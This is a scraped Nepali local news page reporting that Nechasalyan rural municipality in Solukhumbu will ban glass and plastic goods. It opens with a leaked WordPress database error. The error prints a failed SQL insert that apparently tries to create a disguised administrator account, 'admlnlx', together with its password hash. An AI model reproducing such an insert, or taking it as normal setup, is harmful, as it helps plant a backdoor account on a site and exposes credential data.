WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BUYARQ5hslzZ4PWMBsxhvk4QIPdMhX0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 12:14:44', '', 'admlnlx', 'admlnlx')
गाउँले न्यूज, ८ चैत्र, सोलुखुम्बु । नेचासल्यान गाउँपालिकाले सिसाजन्य र प्लाष्टिकजन्य वस्तुको प्रयोगमा प्रतिबन्ध लगाउने निर्णय गरेको छ ।
चैत्र ५ मा बसेको गाउँपालिकाको गाउँसभाले आर्थिक बर्ष २०७६/७७ को साउन १ देखि गाउँपालिकाभित्र सिसा र प्लाष्टिकको प्रयोगमा प्रतिबन्ध लगाउने गरि गाउँ सभाबाट निर्णय गरिएको हो ।
सफा गाउँपालिका बनाउनका लागि सिसा र प्लाष्टिकलाई प्रतिबन्ध लगाउने निष्कर्षमा पुगेको गाउँपालिका अध्यक्ष डुफ कुमार बास्तोलाले बताए । आगामी साउन देखि पुर्ण रुपमा प्रतिबन्ध लाग्ने गरि पुर्वअभ्यासका काम गर्ने बास्तोलाले बताए ।
जल, जमिन र वातावरणमा दिर्घकालिन असर पार्ने वस्तुको प्रयोग कमी ल्याउनका लागि सर्वसधारण, होटल, पसल संचालक र व्यवसायीहरुसंग छलफल तथा अन्तरक्रिया गर्ने गाउँपालिकाको तयारी गरिरहेको छ ।